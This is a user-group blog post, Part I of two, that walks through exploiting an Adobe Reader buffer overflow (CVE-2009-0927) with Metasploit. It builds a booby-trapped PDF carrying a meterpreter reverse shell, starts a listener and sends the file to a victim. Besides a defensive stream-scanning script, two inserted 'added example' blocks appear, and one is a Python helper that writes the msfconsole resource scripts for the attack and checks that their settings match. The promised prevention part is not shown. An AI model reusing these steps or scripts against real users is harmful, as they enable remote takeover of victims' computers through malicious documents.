Mumbai Security and Compliance User Group


Adobe Reader Buffer Overflow Exploitation and Prevention, Part I

Feb 01, 2012 01:39 PM

 

I am writing this article in two parts. In the first part I will show how to exploit a fully patched machine that has an unpatched Adobe Reader installed on it, and in the second part I will show how to prevent this attack with Symantec Critical System Protection (SCSP).
 
Adobe Collab.getIcon() Buffer Overflow
 
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat (CVE-2009-0927). Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call (a JavaScript call with an attacker-controlled, overlong string argument), an attacker may be able to execute arbitrary code when the victim opens the file.
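The trigger described above lives in the PDF's JavaScript, and in a real malicious file that script sits inside a FlateDecode-compressed stream, so a plain string search over the file misses it. The scanner below is an added example (not part of the original article and not the Metasploit module's code): it inflates every stream and looks for the Collab.getIcon() indicator. The two sample PDFs are constructed inline for the demonstration; the "malicious" one carries an inert stand-in for the trigger (a long string passed to Collab.getIcon), not the module's actual payload.

```python
import re
import zlib

# Indicators: a JavaScript action, and a call to Collab.getIcon( with any argument.
GETICON_RE = re.compile(rb"Collab\s*\.\s*getIcon\s*\(")
JS_RE = re.compile(rb"/(?:JavaScript|JS)\b")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def _views(data: bytes):
    """Yield the raw file, then every stream body (inflated when it is zlib data)."""
    yield data
    for m in STREAM_RE.finditer(data):
        body = m.group(1)
        try:
            # decompressobj tolerates the EOL bytes that precede 'endstream'
            yield zlib.decompressobj().decompress(body)
        except zlib.error:
            yield body  # uncompressed or differently encoded stream: use as-is


def scan_pdf(data: bytes) -> dict:
    """Look for the getIcon indicator inside every decoded view of the PDF."""
    has_js = False
    calls = 0
    for view in _views(data):
        has_js = has_js or JS_RE.search(view) is not None
        calls += len(GETICON_RE.findall(view))
    return {"has_javascript": has_js, "geticon_calls": calls, "suspicious": calls > 0}


def plain_grep_finds(data: bytes) -> bool:
    """What a naive string search over the raw file sees (no stream inflation)."""
    return GETICON_RE.search(data) is not None


def build_sample_pdf(js: bytes, compress: bool = True) -> bytes:
    """Constructed minimal PDF whose OpenAction runs the given JavaScript (test data only)."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /Type /Action /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << " + filt + b"/Length %d >>\nstream\n" % len(body)
        + body + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


# Constructed samples. The "malicious" script is an inert stand-in carrying the
# indicator (an overlong string handed to Collab.getIcon), not a working exploit.
_PAD = b"A" * 512
MALICIOUS_JS = (b'var pad = "' + _PAD + b'"; var buf = pad;'
                b' while (buf.length < 0x10000) buf += pad; Collab.getIcon(buf);')
BENIGN_JS = b'app.alert("Document loaded");'

MALICIOUS_SAMPLE = build_sample_pdf(MALICIOUS_JS)            # script inside a FlateDecode stream
UNCOMPRESSED_SAMPLE = build_sample_pdf(MALICIOUS_JS, False)  # same trigger, stored in the clear
BENIGN_SAMPLE = build_sample_pdf(BENIGN_JS)

if __name__ == "__main__":
    for name, pdf in [("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, scan_pdf(pdf), "plain grep finds it:", plain_grep_finds(pdf))
```

On the compressed sample, plain_grep_finds() returns False while scan_pdf() reports the call, which is the point: any file-based check for this trigger has to decode the streams first. The scanner is an indicator check, not a parser; object streams (/ObjStm) and other filters would need the same inflation treatment.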
 
Exploitation of Adobe Collab.getIcon() Buffer Overflow Vulnerability
 
1) Our victim is running Windows XP Professional SP3; its IP address is 192.168.42.23.

2) The victim's operating system is fully patched.

3) Adobe Reader 8 is installed on the victim machine. Only the unpatched releases (earlier than 8.1.3) are affected, so it is the Reader install that is out of date here, not the operating system.

4) I am using BackTrack 5 R1 as the attacker machine; its IP address is 192.168.42.62.

5) I am using the windows/fileformat/adobe_geticon Metasploit module to exploit the Adobe Collab.getIcon() buffer overflow vulnerability (use exploit/windows/fileformat/adobe_geticon).

6) Set the output file name (set FILENAME secret.pdf).

7) Select the windows/meterpreter/reverse_tcp payload (set PAYLOAD windows/meterpreter/reverse_tcp).

8) Set LHOST to the attacker machine's IP address (set LHOST 192.168.42.62), then type exploit and press Enter. The module writes the malicious PDF as secret.pdf.

9) Now set up a listener with the multi/handler module (use exploit/multi/handler). Select the same windows/meterpreter/reverse_tcp payload, set LHOST to the attacker machine's IP address and LPORT to the port that was used when the PDF was generated (the default is 4444), then type exploit and press Enter. The listener is now running on the attacker machine.

10) Send the PDF to the victim. When the victim opens it in the vulnerable Reader, the exploit runs on their machine and connects back to the listener on the attacker machine.

11) I successfully got a Meterpreter shell on the victim machine.

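Steps 5 to 9 are easiest to reproduce as two msfconsole resource scripts, one for the PDF generator and one for the handler. The helper below is an added example (not code from the original article or from Metasploit): it writes both scripts from the same LHOST/LPORT/FILENAME values, validates the address, and checks the one thing that silently breaks this procedure, a payload, LHOST or LPORT that differs between the generator and the handler. The 4444 default is Metasploit's own default LPORT for reverse_tcp; the .rc file names are assumptions.

```python
import ipaddress

PAYLOAD = "windows/meterpreter/reverse_tcp"


def build_resource_scripts(lhost: str, lport: int = 4444, filename: str = "secret.pdf"):
    """Return (generator_rc, handler_rc): the msfconsole commands for steps 5 to 9."""
    ipaddress.ip_address(lhost)  # raises ValueError on a mistyped attacker address
    if not 1 <= lport <= 65535:
        raise ValueError("LPORT must be in 1-65535")
    if not filename.lower().endswith(".pdf"):
        raise ValueError("FILENAME should end in .pdf so the victim opens it with Reader")
    generator = "\n".join([
        "use exploit/windows/fileformat/adobe_geticon",
        f"set FILENAME {filename}",
        f"set PAYLOAD {PAYLOAD}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "exploit",
        "",
    ])
    handler = "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {PAYLOAD}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",  # keep listening after the first session arrives
        "exploit -j",               # run the listener as a background job
        "",
    ])
    return generator, handler


def settings(rc: str) -> dict:
    """Parse the 'set NAME value' lines of a resource script into a dict."""
    out = {}
    for line in rc.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0] == "set":
            out[parts[1].upper()] = parts[2]
    return out


def handler_matches(generator_rc: str, handler_rc: str) -> bool:
    """No session ever arrives unless PAYLOAD, LHOST and LPORT agree on both sides."""
    g, h = settings(generator_rc), settings(handler_rc)
    return all(g.get(key) == h.get(key) for key in ("PAYLOAD", "LHOST", "LPORT"))


if __name__ == "__main__":
    gen, hnd = build_resource_scripts("192.168.42.62")
    with open("geticon.rc", "w") as f:   # hypothetical file names
        f.write(gen)
    with open("handler.rc", "w") as f:
        f.write(hnd)
    print("generator and handler consistent:", handler_matches(gen, hnd))
    # On the attacker box: msfconsole -r geticon.rc, then msfconsole -r handler.rc
```

Run the generator script first (it writes the PDF under Metasploit's local data directory), then start the handler before sending the file; the session only shows up if the handler is already listening on the LPORT baked into the PDF.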
 
In the next part I will show how to prevent exploitation of the Adobe Collab.getIcon() buffer overflow vulnerability with Symantec Critical System Protection.

Comments

Apr 04, 2012 08:55 AM

@wxzcool: You're welcome, bro.

Apr 03, 2012 01:45 PM

All your articles are so great! Thank you for sharing.
